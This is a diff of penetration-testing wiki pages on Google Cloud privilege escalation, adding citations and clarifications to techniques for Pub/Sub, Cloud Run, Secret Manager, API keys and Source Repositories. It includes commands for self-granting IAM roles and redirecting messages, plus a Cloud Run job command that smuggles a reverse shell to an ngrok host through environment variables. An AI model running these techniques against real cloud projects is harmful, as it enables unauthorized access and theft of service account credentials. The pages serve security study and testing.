+- [4] [gcloud resource-manager org-policies describe - Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/resource-manager/org-policies/describe)
+- [5] [gcloud resource-manager org-policies disable-enforce - Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/resource-manager/org-policies/disable-enforce)
+- [6] [Attach service accounts to resources - Google Cloud Documentation](https://cloud.google.com/iam/docs/attach-service-accounts)
+- [7] [Method: organizations.setOrgPolicy - Google Cloud Documentation](https://cloud.google.com/resource-manager/reference/rest/v1/organizations/setOrgPolicy)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Pubsub Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## PubSub
 
 Get more information in:
@@ -12,7 +10,21 @@ Get more information in:
 
 ### `pubsub.snapshots.create` (`pubsub.topics.attachSubscription`)
 
-The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**. 
+Pub/Sub snapshots are created from subscriptions, not directly from topics. A snapshot retains the source subscription's unacknowledged backlog at creation and messages published to that subscription's topic after creation. Creating a snapshot requires `pubsub.snapshots.create` on the containing project and `pubsub.subscriptions.consume` on the source subscription; creating a new subscription attached to a topic separately requires `pubsub.subscriptions.create` on the project and `pubsub.topics.attachSubscription` on the topic.<sup>[[1]](#references)[[2]](#references)</sup>
+
+When a same-topic subscription is available, seeking it to the snapshot can replay the retained messages through that subscription instead of requiring direct topic reads (an inference from the documented snapshot/seek flow); the coverage depends on the source backlog and retention state.<sup>[[2]](#references)</sup>
+
+The documented snapshot workflow is:<sup>[[2]](#references)</sup>
+
+```bash
+gcloud pubsub snapshots create <SNAPSHOT_NAME> \
+  --subscription=<SUBSCRIPTION_NAME>
+
+gcloud pubsub subscriptions seek <SUBSCRIPTION_NAME> \
+  --snapshot=<SNAPSHOT_NAME>
+```
+
+For the related push-subscription path, create a subscription attached to the topic and send deliveries to an HTTPS endpoint you control:<sup>[[3]](#references)</sup>
 
 ```bash
 gcloud pubsub subscriptions create <subscription_name> --topic <topic_name> --push-endpoint https://<URL_to_push_to>
@@ -20,22 +32,22 @@ gcloud pubsub subscriptions create <subscription_name> --topic <topic_name> --pu
 
 ### **`pubsub.snapshots.setIamPolicy`**
 
-Assign the pervious permissions to you.
+Use this permission to set a snapshot's IAM policy and grant a principal snapshot-scoped roles, such as a role containing `pubsub.snapshots.seek`. It does not replace the separate `pubsub.subscriptions.consume` requirement for reading through a subscription or the `pubsub.snapshots.create` requirement on the project.<sup>[[1]](#references)</sup>
 
 ### `pubsub.subscriptions.create`
 
-You can create a push subscription in a topic that will be sending all the received messages to the indicated URL
+With `pubsub.subscriptions.create` on the project and `pubsub.topics.attachSubscription` on the topic, you can create a push subscription that sends delivered messages to the indicated endpoint. Push endpoints must be publicly accessible HTTPS URLs.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ### **`pubsub.subscriptions.update`**
 
-Set your own URL as push endpoint to steal the messages.
+`pubsub.subscriptions.update` includes changing a subscription's push configuration. Setting your own endpoint can redirect that subscription's future deliveries to an endpoint you control (an inference from the documented push-delivery behavior); the actual messages received depend on the subscription's backlog, filters, retention, and acknowledgment state.<sup>[[1]](#references)[[3]](#references)[[5]](#references)</sup>
 
 ### `pubsub.subscriptions.consume`
 
-Access messages using the subscription.
+This permission allows pulling messages from a subscription. The command below returns up to 50 messages in JSON; `--limit` is a maximum, not a guarantee that the entire backlog will be returned in one call.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ```bash
-gcloud pubsub subscriptions pull <SUSCRIPTION> \
+gcloud pubsub subscriptions pull <SUBSCRIPTION> \
   --limit=50 \
   --format="json" \
   --project=<PROJECTID>
@@ -43,23 +55,25 @@ gcloud pubsub subscriptions pull <SUSCRIPTION> \
 
 ### `pubsub.subscriptions.setIamPolicy`
 
-Give yourself any of the preiovus permissions
+Use this permission to grant your principal subscription-scoped roles containing the preceding operations, such as `pubsub.subscriptions.consume` or `pubsub.subscriptions.update`. Project- and topic-scoped permissions such as `pubsub.snapshots.create`, `pubsub.subscriptions.create`, and `pubsub.topics.attachSubscription` must still be granted on their documented resources.<sup>[[1]](#references)</sup>
+
+The following commands add, remove, or replace IAM bindings on a subscription; the policy-file form is useful when changing the complete policy.<sup>[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 # Add Binding
-gcloud pubsub subscriptions add-iam-policy-binding <SUSCRIPTION_NAME> \
+gcloud pubsub subscriptions add-iam-policy-binding <SUBSCRIPTION_NAME> \
   --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
   --role="<ROLE_OR_CUSTOM_ROLE>" \
   --project="<PROJECT_ID>"
 
 # Remove Binding
-gcloud pubsub subscriptions remove-iam-policy-binding <SUSCRIPTION_NAME> \
+gcloud pubsub subscriptions remove-iam-policy-binding <SUBSCRIPTION_NAME> \
   --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
   --role="<ROLE_OR_CUSTOM_ROLE>" \
   --project="<PROJECT_ID>"
 
 # Change Policy
-gcloud pubsub subscriptions set-iam-policy <SUSCRIPTION_NAME> \
+gcloud pubsub subscriptions set-iam-policy <SUBSCRIPTION_NAME> \
   <(echo '{
     "bindings": [
       {
@@ -73,7 +87,15 @@ gcloud pubsub subscriptions set-iam-policy <SUSCRIPTION_NAME> \
   --project=<PROJECT_ID>
 ```
 
+## References
+
+- [1] [Access control with Identity and Access Management | Pub/Sub | Google Cloud Documentation](https://docs.cloud.google.com/pubsub/docs/access-control)
+- [2] [Replay and purge messages with seek | Pub/Sub | Google Cloud Documentation](https://docs.cloud.google.com/pubsub/docs/replay-overview)
+- [3] [Create push subscriptions | Pub/Sub | Google Cloud Documentation](https://docs.cloud.google.com/pubsub/docs/create-push-subscription)
+- [4] [gcloud pubsub subscriptions pull | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/subscriptions/pull)
+- [5] [gcloud pubsub subscriptions update | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/subscriptions/update)
+- [6] [gcloud pubsub subscriptions add-iam-policy-binding | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/subscriptions/add-iam-policy-binding)
+- [7] [gcloud pubsub subscriptions remove-iam-policy-binding | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/subscriptions/remove-iam-policy-binding)
+- [8] [gcloud pubsub subscriptions set-iam-policy | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/subscriptions/set-iam-policy)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md
@@ -1,22 +1,24 @@
 # GCP - Resourcemanager Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## resourcemanager
 
 ### `resourcemanager.organizations.setIamPolicy`
 
-Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example.
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission lets you set the organization IAM policy and use role inheritance to change your effective permissions on resources under the organization.<sup>[[1]](#references)[[2]](#references)</sup> So, you can follow the same exploitation example.
 
 ### `resourcemanager.folders.setIamPolicy`
 
-Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example.
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission lets you set the folder IAM policy and use role inheritance to change your effective permissions on resources in that folder's subtree.<sup>[[1]](#references)[[2]](#references)</sup> So, you can follow the same exploitation example.
 
 ### `resourcemanager.projects.setIamPolicy`
 
-Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example.
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission lets you set the project IAM policy and use role inheritance to change your effective permissions on resources within the project.<sup>[[1]](#references)[[2]](#references)</sup> So, you can follow the same exploitation example.
+
+## References
+
+- [1] [Using resource hierarchy for access control](https://docs.cloud.google.com/iam/docs/resource-hierarchy-access-control)
+- [2] [Manage access to projects, folders, and organizations](https://docs.cloud.google.com/iam/docs/granting-changing-revoking-access)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
 
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Run Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Cloud Run
 
 For more information about Cloud Run check:
@@ -12,15 +10,15 @@ For more information about Cloud Run check:
 
 ### `run.services.create` , `iam.serviceAccounts.actAs`, **`run.routes.invoke`**
 
-An attacker with these permissions to **create a run service running arbitrary code** (arbitrary Docker container), attach a Service Account to it, and make the code **exfiltrate the Service Account token from the metadata**.
+An attacker with these permissions to **create a run service running arbitrary code** (arbitrary Docker container), attach a Service Account to it, and make the code **exfiltrate the Service Account token from the metadata**.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
-An exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py) and the Docker image can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage).
+An exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py) and the Docker image can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage).<sup>[[1]](#references)[[6]](#references)[[7]](#references)</sup>
 
-Note that when using `gcloud run deploy` instead of just creating the service **it needs the `update` permission**. Check an [**example here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/o-run.services.create.sh).
+Note that when using `gcloud run deploy` instead of just creating the service **it needs the `update` permission**. Check an [**example here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/o-run.services.create.sh).<sup>[[2]](#references)[[5]](#references)[[8]](#references)</sup>
 
 ### `run.services.update` , `iam.serviceAccounts.actAs`
 
-Like the previous one but updating a service:
+Like the previous one but updating a service:<sup>[[2]](#references)[[3]](#references)[[5]](#references)</sup>
 
 ```bash
 # Launch some web server to listen in port 80 so the service works
@@ -40,7 +38,7 @@ gcloud run deploy hacked \
 
 ### `run.services.setIamPolicy`
 
-Give yourself previous permissions over cloud Run.
+Give yourself previous permissions over cloud Run.<sup>[[2]](#references)[[9]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 # Change policy
@@ -62,7 +60,7 @@ gcloud run services remove-iam-policy-binding <SERVICE_NAME> \
 
 ### `run.jobs.create`, `run.jobs.run`, `iam.serviceaccounts.actAs`,(`run.jobs.get`)
 
-Launch a job with a reverse shell to steal the service account indicated in the command. You can find an [**exploit here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/m-run.jobs.create.sh).
+Launch a job with a reverse shell to steal the service account indicated in the command. You can find an [**exploit here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/m-run.jobs.create.sh).<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 gcloud beta run jobs create jab-cloudrun-3326 \
@@ -76,7 +74,7 @@ gcloud beta run jobs create jab-cloudrun-3326 \
 
 ### `run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`)
 
-Similar to the previous one it's possible to **update a job and update the SA**, the **command** and **execute it**:
+Similar to the previous one it's possible to **update a job and update the SA**, the **command** and **execute it**:<sup>[[2]](#references)[[3]](#references)[[12]](#references)[[14]](#references)</sup>
 
 ```bash
 gcloud beta run jobs update hacked \
@@ -90,7 +88,7 @@ gcloud beta run jobs update hacked \
 
 ### `run.jobs.setIamPolicy`
 
-Give yourself the previous permissions over Cloud Jobs.
+Give yourself the previous permissions over Cloud Jobs.<sup>[[2]](#references)[[15]](#references)[[16]](#references)[[17]](#references)</sup>
 ```bash
 # Change policy
 gcloud run jobs set-iam-policy <JOB_NAME> <POLICY_FILE>.json \
@@ -111,7 +109,7 @@ gcloud run jobs remove-iam-policy-binding <JOB_NAME> \
 
 ### `run.jobs.run`, `run.jobs.runWithOverrides`, (`run.jobs.get`)
 
-Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata:
+Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata:<sup>[[2]](#references)[[4]](#references)[[12]](#references)[[18]](#references)[[19]](#references)[[20]](#references)</sup>
 
 ```bash
 gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s"
@@ -119,9 +117,27 @@ gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHO
 
 ## References
 
-- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [1] [Privilege Escalation in Google Cloud Platform - Part 1 (IAM) - Rhino Security Labs](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [2] [Cloud Run IAM permissions](https://docs.cloud.google.com/run/docs/reference/iam/permissions)
+- [3] [Requiring permission to attach service accounts to resources](https://docs.cloud.google.com/iam/docs/service-accounts-actas)
+- [4] [Introduction to service identity - Cloud Run](https://docs.cloud.google.com/run/docs/securing/service-identity)
+- [5] [Deploy container images to Cloud Run services](https://docs.cloud.google.com/run/docs/deploying)
+- [6] [run.services.create.py](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py)
+- [7] [Cloud Run Docker image](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage)
+- [8] [o-run.services.create.sh](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/o-run.services.create.sh)
+- [9] [gcloud run services set-iam-policy](https://docs.cloud.google.com/sdk/gcloud/reference/run/services/set-iam-policy)
+- [10] [gcloud run services add-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/run/services/add-iam-policy-binding)
+- [11] [gcloud run services remove-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/run/services/remove-iam-policy-binding)
+- [12] [Create jobs - Cloud Run](https://docs.cloud.google.com/run/docs/create-jobs)
+- [13] [m-run.jobs.create.sh](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/m-run.jobs.create.sh)
+- [14] [gcloud run jobs update](https://docs.cloud.google.com/sdk/gcloud/reference/run/jobs/update)
+- [15] [gcloud run jobs set-iam-policy](https://docs.cloud.google.com/sdk/gcloud/reference/run/jobs/set-iam-policy)
+- [16] [gcloud run jobs add-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/run/jobs/add-iam-policy-binding)
+- [17] [gcloud run jobs remove-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/run/jobs/remove-iam-policy-binding)
+- [18] [Execute jobs - Cloud Run](https://docs.cloud.google.com/run/docs/execute/jobs)
+- [19] [Command line and environment - Python documentation](https://docs.python.org/3/using/cmdline.html)
+- [20] [webbrowser - Python documentation](https://docs.python.org/3/library/webbrowser.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
 
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Secretmanager Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## secretmanager
 
 For more information about secretmanager:
@@ -12,7 +10,7 @@ For more information about secretmanager:
 
 ### `secretmanager.versions.access`
 
-This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
+The `secretmanager.versions.access` permission allows an identity to read a selected Secret Manager version's contents. <sup>[[1]](#references)[[2]](#references)</sup> If the secret contains credentials or other privileged material, reading it may enable privilege escalation; the impact depends on what is stored in the secret.
 
 <details><summary>Get clear-text secret version</summary>
 
@@ -31,7 +29,7 @@ As this is also a post exploitation technique it can be found in:
 
 ### `secretmanager.secrets.setIamPolicy`
 
-This give you access to give you access to read the secrets from the secret manager, like using:
+The `secretmanager.secrets.setIamPolicy` permission lets a principal change a secret's IAM policy. Granting `roles/secretmanager.secretAccessor` to a member lets that member access the secret payload. <sup>[[2]](#references)[[3]](#references)</sup>
 
 <details><summary>Add IAM policy binding to secret</summary>
 
@@ -41,7 +39,7 @@ gcloud secrets add-iam-policy-binding <scret-name> \
   --role="roles/secretmanager.secretAccessor"
 ```
 
-Or revoke policies with:
+Or revoke policies with: <sup>[[4]](#references)</sup>
 ```bash
 gcloud secrets remove-iam-policy-binding <secret-name> \
 --member="serviceAccount:<sa-name>@<PROJECT_ID>.iam.gserviceaccount.com" \
@@ -50,7 +48,11 @@ gcloud secrets remove-iam-policy-binding <secret-name> \
 
 </details>
 
+## References
+
+- [1] [Access a secret version](https://docs.cloud.google.com/secret-manager/docs/access-secret-version)
+- [2] [Secret Manager roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/secretmanager)
+- [3] [gcloud secrets add-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/secrets/add-iam-policy-binding)
+- [4] [gcloud secrets remove-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/secrets/remove-iam-policy-binding)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
@@ -1,12 +1,10 @@
 # GCP - Serviceusage Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## serviceusage
 
-The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
+The permissions below have historically been useful for creating and recovering API keys.<sup>[[1]](#references)</sup> A standard API key is an encrypted string that identifies an application without a principal; it associates requests with a project for quota and billing, and can be used only with APIs that accept API keys.<sup>[[2]](#references)</sup>
 
-Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
+Therefore, abusing a standard API key can make the target project pay for API usage, but the key itself does not authenticate a principal and cannot grant IAM privileges. Authorization keys are different: they are bound to a service account and requests using them run as that service account, so the limitation above applies only to standard keys.<sup>[[2]](#references)</sup>
 
 To learn other permissions and ways to generate API keys check:
 
@@ -14,11 +12,13 @@ To learn other permissions and ways to generate API keys check:
 gcp-apikeys-privesc.md
 {{#endref}}
 
-### `serviceusage.apiKeys.create`
+### `serviceusage.apiKeys.create` (legacy; current `apikeys.keys.create`)
 
-An undocumented API was found that can be used to **create API keys:**
+The original research described an undocumented HTTP API for creating API keys. The current API Keys API exposes the documented `projects.locations.keys.create` method and requires `apikeys.keys.create`; the current Service Usage role documentation lists that permission under the API Keys Admin role rather than under the legacy `serviceusage.apiKeys.create` name.<sup>[[1]](#references)[[3]](#references)[[4]](#references)[[6]](#references)</sup>
 
 <details><summary>Create API key using undocumented API</summary>
+
+The request below is the historical endpoint described by Rhino Security Labs; its v1 path is retained for reference. The linked exploit script shows the corresponding API Keys client method used by the research tooling.<sup>[[1]](#references)[[6]](#references)</sup>
 
 ```bash
 curl -XPOST "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"
@@ -26,11 +26,13 @@ curl -XPOST "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>
 
 </details>
 
-### `serviceusage.apiKeys.list`
+### `serviceusage.apiKeys.list` (legacy; current `apikeys.keys.list`)
 
-Another undocumented API was found for listing API keys that have already been created (the API keys appears in the response):
+The original research also reported an undocumented API for listing previously created API keys and seeing their values in the response. The current documented v2 `keys.list` method requires `apikeys.keys.list` but does not return key strings; retrieving a key string now uses `keys.getKeyString` and the separate `apikeys.keys.getKeyString` permission.<sup>[[1]](#references)[[3]](#references)[[5]](#references)</sup>
 
 <details><summary>List API keys using undocumented API</summary>
+
+The request below is the historical endpoint documented by Rhino Security Labs; its v1 path is retained for reference.<sup>[[1]](#references)[[7]](#references)</sup>
 
 ```bash
 curl "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"
@@ -38,13 +40,9 @@ curl "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKey
 
 </details>
 
-### **`serviceusage.services.enable`** , **`serviceusage.services.use`**
+### **`serviceusage.services.enable`**, **`serviceusage.services.use`**
 
-With these permissions an attacker can enable and use new services in the project. This could allow an **attacker to enable service like admin or cloudidentity** to try to access Workspace information, or other services to access interesting data.
-
-## **References**
-
-- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+With these permissions an attacker can enable APIs and use enabled services in the project. This could allow an **attacker to enable services such as `admin.googleapis.com` or `cloudidentity.googleapis.com`** to try Workspace enumeration or access other interesting APIs, but enabling an API alone does not grant the API's separate Workspace authorization requirements.<sup>[[3]](#references)[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
 <details>
 
@@ -63,6 +61,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **.**
 
 </details>
+
+## References
+
+- [1] [Privilege Escalation in Google Cloud Platform - Part 2 (Non-IAM) - Rhino Security Labs](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+- [2] [Manage API keys | Google Cloud Documentation](https://cloud.google.com/docs/authentication/api-keys)
+- [3] [Service Usage roles and permissions | Google Cloud Documentation](https://cloud.google.com/iam/docs/roles-permissions/serviceusage)
+- [4] [Method: projects.locations.keys.create | API Keys API Documentation](https://cloud.google.com/api-keys/docs/reference/rest/v2/projects.locations.keys/create)
+- [5] [Method: projects.locations.keys.list | API Keys API Documentation](https://cloud.google.com/api-keys/docs/reference/rest/v2/projects.locations.keys/list)
+- [6] [serviceusage.apiKeys.create.py | RhinoSecurityLabs/GCP-IAM-Privilege-Escalation](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.create.py)
+- [7] [serviceusage.apiKeys.list.py | RhinoSecurityLabs/GCP-IAM-Privilege-Escalation](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.list.py)
+- [8] [Setting up the Groups API | Google Cloud Documentation](https://cloud.google.com/identity/docs/how-to/setup)
+- [9] [Enable and disable services | Google Cloud Documentation](https://cloud.google.com/service-usage/docs/enable-disable)
+- [10] [Admin SDK API overview | Google for Developers](https://developers.google.com/workspace/admin/overview)
 
 
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md
@@ -1,8 +1,9 @@
 # GCP - Sourcerepos Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Source Repositories
+
+> [!NOTE]
+> Cloud Source Repositories is unavailable to new customers. These techniques therefore apply to organizations that were already using the service before June 17, 2024.<sup>[[6]](#references)</sup>
 
 For more information about Source Repositories check:
 
@@ -12,7 +13,7 @@ For more information about Source Repositories check:
 
 ### `source.repos.get`
 
-With this permission it's possible to download the repository locally:
+With this permission it's possible to clone the repository locally and fetch or browse it.<sup>[[1]](#references)[[3]](#references)</sup>
 
 <details><summary>Clone source repository</summary>
 
@@ -31,11 +32,11 @@ A principal with this permission **will be able to write code inside a repositor
 - Source Repository Administrator (`roles/source.admin`)
 - Source Repository Writer (`roles/source.writer`)
 
-To write just perform a regular **`git push`**.
+To write just perform a regular **`git push`**.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### `source.repos.setIamPolicy`
 
-With this permission an attacker could grant himself the previous permissions.
+With this permission an attacker could grant himself the previous permissions by changing the repository's IAM policy.<sup>[[1]](#references)</sup>
 
 ### Secret access
 
@@ -47,9 +48,9 @@ gcp-secretmanager-privesc.md
 
 ### Add SSH keys
 
-It's possible to **add ssh keys to the Source Repository project** in the web console. It makes a post request to **`/v1/sshKeys:add`** and can be configured in [https://source.cloud.google.com/user/ssh_keys](https://source.cloud.google.com/user/ssh_keys)
+It's possible to **register an SSH public key for the Google Account** in the Cloud Source Repositories web console.<sup>[[4]](#references)</sup> It makes a post request to **`/v1/sshKeys:add`** and can be configured in [https://source.cloud.google.com/user/ssh_keys](https://source.cloud.google.com/user/ssh_keys)
 
-Once your ssh key is set, you can access a repo with:
+Once your SSH key is set, you can access a repo with the documented SSH URL format:<sup>[[3]](#references)[[4]](#references)</sup>
 
 <details><summary>Clone repository using SSH</summary>
 
@@ -59,27 +60,27 @@ git clone ssh://username@domain.com@source.developers.google.com:2022/p/<proj-na
 
 </details>
 
-And then use **`git`** commands are per usual.
+And then use regular **`git`** commands.<sup>[[4]](#references)</sup>
 
 ### Manual Credentials
 
-It's possible to create manual credentials to access the Source Repositories:
+It's possible to create manually generated credentials to access Cloud Source Repositories.<sup>[[4]](#references)</sup>
 
 <figure><img src="../../../images/image (324).png" alt=""><figcaption></figcaption></figure>
 
-Clicking on the first link it will direct you to [https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3](https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform&state&authuser=3)
+Clicking on the first link directs you to the Configure Git flow: [https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3](https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform&state&authuser=3)<sup>[[4]](#references)</sup>
 
 Which will prompt an **Oauth authorization prompt** to give access to **Google Cloud Development**. So you will need either the **credentials of the user** or an **open session in the browser** for this.
 
-This will send you to a page with a **bash script to execute** and configure a git cookie in **`$HOME/.gitcookies`**
+This will send you to a page with a **bash script to execute** and configure a git cookie in **`$HOME/.gitcookies`**.<sup>[[4]](#references)</sup>
 
 <figure><img src="../../../images/image (323).png" alt=""><figcaption></figcaption></figure>
 
-Executing the script you can then use git clone, push... and it will work.
+Executing the script you can then use `git clone`, `git push`, and other standard Git commands.<sup>[[4]](#references)</sup>
 
 ### `source.repos.updateProjectConfig`
 
-With this permission it's possible to disable Source Repositories default protection to not upload code containing Private Keys:
+With this permission it's possible to disable Source Repositories default protection to not upload code containing Private Keys.<sup>[[1]](#references)[[5]](#references)</sup>
 
 <details><summary>Disable pushblock and modify pub/sub configuration</summary>
 
@@ -91,12 +92,20 @@ You can also configure a different pub/sub topic or even disable it completely:
 
 ```bash
 gcloud source project-configs update --remove-topic=REMOVE_TOPIC
-gcloud source project-configs update --remove-topic=UPDATE_TOPIC
+gcloud source project-configs update --update-topic=UPDATE_TOPIC
 ```
 
 </details>
 
+The current `gcloud` reference uses `--update-topic=UPDATE_TOPIC` to change an existing topic.<sup>[[5]](#references)</sup>
+
+## References
+
+- [1] [Access control with IAM | Cloud Source Repositories](https://cloud.google.com/source-repositories/docs/configure-access-control)
+- [2] [Cloud Source Repositories roles and permissions | Google Cloud IAM](https://cloud.google.com/iam/docs/roles-permissions/source)
+- [3] [Cloning a repository | Cloud Source Repositories](https://cloud.google.com/source-repositories/docs/cloning-repositories)
+- [4] [Setting up local authentication | Cloud Source Repositories](https://cloud.google.com/source-repositories/docs/authentication)
+- [5] [gcloud source project-configs update | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/source/project-configs/update)
+- [6] [Cloud Source Repositories release notes | Google Cloud Documentation](https://cloud.google.com/source-repositories/docs/release-notes)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Storage Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Storage
 
 Basic Information:
@@ -12,14 +10,14 @@ Basic Information:
 
 ### `storage.objects.get`
 
-This permission allows you to **download files stored inside Cloud Storage**. This will potentially allow you to escalate privileges because in some occasions **sensitive information is saved there**. Moreover, some GCP services stores their information in buckets:
